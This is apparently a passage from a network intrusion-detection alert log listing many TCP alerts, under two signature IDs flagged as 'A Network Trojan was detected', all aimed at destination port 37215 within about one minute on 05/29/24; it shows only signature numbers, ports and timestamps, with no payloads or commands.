                SID:2835222
                Source Port:59658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324408
                SID:2829579
                Source Port:54044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508304
                SID:2835222
                Source Port:39790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.087330
                SID:2829579
                Source Port:49690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882856
                SID:2829579
                Source Port:59374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.285677
                SID:2829579
                Source Port:34418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.959727
                SID:2829579
                Source Port:49266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886003
                SID:2835222
                Source Port:41142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223261
                SID:2835222
                Source Port:60176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418658
                SID:2829579
                Source Port:41182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042579
                SID:2829579
                Source Port:41854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651811
                SID:2835222
                Source Port:56234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629912
                SID:2829579
                Source Port:36666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764061
                SID:2835222
                Source Port:42682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.040722
                SID:2829579
                Source Port:33110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224755
                SID:2829579
                Source Port:52238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.985429
                SID:2829579
                Source Port:33954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.531584
                SID:2829579
                Source Port:58982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.939192
                SID:2829579
                Source Port:60652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728793
                SID:2835222
                Source Port:53724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900221
                SID:2829579
                Source Port:36008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.021677
                SID:2835222
                Source Port:49404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.139908
                SID:2835222
                Source Port:48356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765692
                SID:2835222
                Source Port:42476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227370
                SID:2835222
                Source Port:59794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227951
                SID:2829579
                Source Port:45338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212208
                SID:2829579
                Source Port:43768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.713638
                SID:2835222
                Source Port:50466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434772
                SID:2829579
                Source Port:60606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631649
                SID:2835222
                Source Port:57838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928373
                SID:2835222
                Source Port:46660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779830
                SID:2829579
                Source Port:54112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532291
                SID:2829579
                Source Port:38268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.534168
                SID:2829579
                Source Port:37886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179688
                SID:2829579
                Source Port:38472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612127
                SID:2829579
                Source Port:41974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712109
                SID:2829579
                Source Port:49516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209524
                SID:2829579
                Source Port:36408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896135
                SID:2835222
                Source Port:56076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.551378
                SID:2829579
                Source Port:44986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271269
                SID:2829579
                Source Port:57886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896895
                SID:2835222
                Source Port:43072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.910792
                SID:2835222
                Source Port:47342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.648857
                SID:2829579
                Source Port:57344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931205
                SID:2835222
                Source Port:40114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008550
                SID:2835222
                Source Port:38042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518881
                SID:2835222
                Source Port:36374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287196
                SID:2829579
                Source Port:33968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535992
                SID:2835222
                Source Port:50086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982826
                SID:2829579
                Source Port:35020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.277614
                SID:2829579
                Source Port:39602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282771
                SID:2829579
                Source Port:59532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.036762
                SID:2829579
                Source Port:46104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071362
                SID:2835222
                Source Port:46944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655131
                SID:2829579
                Source Port:60454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361442
                SID:2835222
                Source Port:35256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716175
                SID:2835222
                Source Port:49992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628558
                SID:2835222
                Source Port:42820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.275986
                SID:2829579
                Source Port:35692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329602
                SID:2835222
                Source Port:39866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868529
                SID:2835222
                Source Port:36972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946784
                SID:2829579
                Source Port:43622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.040047
                SID:2835222
                Source Port:34832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781828
                SID:2829579
                Source Port:56910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943104
                SID:2835222
                Source Port:51282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869574
                SID:2829579
                Source Port:36018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420964
                SID:2835222
                Source Port:54708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874905
                SID:2829579
                Source Port:52810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.453374
                SID:2829579
                Source Port:33328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.806312
                SID:2829579
                Source Port:40026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655269
                SID:2829579
                Source Port:35414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.587063
                SID:2835222
                Source Port:40852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225687
                SID:2829579
                Source Port:39746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852511
                SID:2835222
                Source Port:46112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655854
                SID:2829579
                Source Port:42272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982492
                SID:2829579
                Source Port:50990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.969873
                SID:2835222
                Source Port:35688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567927
                SID:2829579
                Source Port:49766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182308
                SID:2829579
                Source Port:33974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728655
                SID:2829579
                Source Port:35708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271423
                SID:2829579
                Source Port:59816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670370
                SID:2829579
                Source Port:51838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617326
                SID:2835222
                Source Port:56664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422386
                SID:2835222
                Source Port:50418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574286
                SID:2829579
                Source Port:37570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.915460
                SID:2835222
                Source Port:41454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444511
                SID:2829579
                Source Port:42452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215457
                SID:2829579
                Source Port:39886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898410
                SID:2829579
                Source Port:39876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567223
                SID:2829579
                Source Port:55946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261444
                SID:2835222
                Source Port:35826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558186
                SID:2835222
                Source Port:37930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716154
                SID:2835222
                Source Port:46368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666163
                SID:2829579
                Source Port:35888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.330155
                SID:2835222
                Source Port:34104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014965
                SID:2835222
                Source Port:41604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.181581
                SID:2829579
                Source Port:44450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277689
                SID:2835222
                Source Port:59138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212308
                SID:2829579
                Source Port:39262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687006
                SID:2835222
                Source Port:32930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985614
                SID:2829579
                Source Port:47930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520995
                SID:2829579
                Source Port:52486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.793735
                SID:2835222
                Source Port:46138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.832958
                SID:2829579
                Source Port:55762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535874
                SID:2835222
                Source Port:33984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.278245
                SID:2829579
                Source Port:50492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209484
                SID:2829579
                Source Port:41588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.877200
                SID:2829579
                Source Port:51112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506113
                SID:2835222
                Source Port:60312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631576
                SID:2829579
                Source Port:40724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.234142
                SID:2835222
                Source Port:46088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267648
                SID:2835222
                Source Port:45686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558654
                SID:2829579
                Source Port:41038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207489
                SID:2829579
                Source Port:56776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.215543
                SID:2835222
                Source Port:43338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807611
                SID:2829579
                Source Port:37668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.914904
                SID:2835222
                Source Port:42168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899030
                SID:2829579
                Source Port:40048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.513194
                SID:2829579
                Source Port:35168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231401
                SID:2835222
                Source Port:44468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.934842
                SID:2835222
                Source Port:36568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981411
                SID:2835222
                Source Port:60812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175160
                SID:2835222
                Source Port:35474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.907633
                SID:2835222
                Source Port:46136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666315
                SID:2829579
                Source Port:49218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.373901
                SID:2835222
                Source Port:35736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.388659
                SID:2835222
                Source Port:42986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.398703
                SID:2829579
                Source Port:43232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870564
                SID:2829579
                Source Port:49474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415928
                SID:2835222
                Source Port:53980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319933
                SID:2835222
                Source Port:38108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897358
                SID:2835222
                Source Port:48144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381132
                SID:2835222
                Source Port:49818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184690
                SID:2829579
                Source Port:36414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328279
                SID:2835222
                Source Port:58916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032727
                SID:2835222
                Source Port:57822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466099
                SID:2829579
                Source Port:34662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498492
                SID:2829579
                Source Port:57074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321894
                SID:2829579
                Source Port:37626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942657
                SID:2829579
                Source Port:33940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263857
                SID:2835222
                Source Port:35168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670982
                SID:2829579
                Source Port:36394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899659
                SID:2829579
                Source Port:55682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.030930
                SID:2835222
                Source Port:56042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445958
                SID:2829579
                Source Port:59232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.944902
                SID:2835222
                Source Port:44548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.070042
                SID:2835222
                Source Port:33372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987363
                SID:2835222
                Source Port:47080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714606
                SID:2829579
                Source Port:56642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328018
                SID:2829579
                Source Port:48926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526763
                SID:2835222
                Source Port:48892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.933328
                SID:2829579
                Source Port:55622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.673589
                SID:2829579
                Source Port:49056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160857
                SID:2835222
                Source Port:57036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782918
                SID:2835222
                Source Port:51170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740105
                SID:2835222
                Source Port:36166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853291
                SID:2835222
                Source Port:35890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714323
                SID:2835222
                Source Port:44726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336458
                SID:2829579
                Source Port:58078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072495
                SID:2835222
                Source Port:36782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784267
                SID:2835222
                Source Port:58556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180886
                SID:2829579
                Source Port:47060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001150
                SID:2829579
                Source Port:37054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133295
                SID:2829579
                Source Port:51204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.548399
                SID:2835222
                Source Port:40932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231035
                SID:2829579
                Source Port:58246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689493
                SID:2829579
                Source Port:44750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510098
                SID:2835222
                Source Port:40986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.645681
                SID:2829579
                Source Port:41278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782463
                SID:2829579
                Source Port:48938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809237
                SID:2829579
                Source Port:52648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140392
                SID:2835222
                Source Port:60234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227266
                SID:2829579
                Source Port:35048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208818
                SID:2829579
                Source Port:43236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928741
                SID:2835222
                Source Port:58690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.818067
                SID:2829579
                Source Port:56650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665340
                SID:2835222
                Source Port:46818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.070322
                SID:2835222
                Source Port:39038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419951
                SID:2829579
                Source Port:50774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613983
                SID:2829579
                Source Port:37516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.799753
                SID:2829579
                Source Port:57714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.232181
                SID:2829579
                Source Port:44812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901395
                SID:2835222
                Source Port:46670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900285
                SID:2835222
                Source Port:49868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.065155
                SID:2835222
                Source Port:52586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573838
                SID:2835222
                Source Port:58856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560134
                SID:2829579
                Source Port:52920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.668996
                SID:2835222
                Source Port:56924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997891
                SID:2829579
                Source Port:56216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992799
                SID:2829579
                Source Port:35714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782226
                SID:2829579
                Source Port:45050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526736
                SID:2835222
                Source Port:37812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.028761
                SID:2829579
                Source Port:55120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519229
                SID:2835222
                Source Port:39152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654523
                SID:2835222
                Source Port:35750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.823300
                SID:2835222
                Source Port:49482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958148
                SID:2829579
                Source Port:33514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.617688
                SID:2835222
                Source Port:33378
                Destination Port:37215
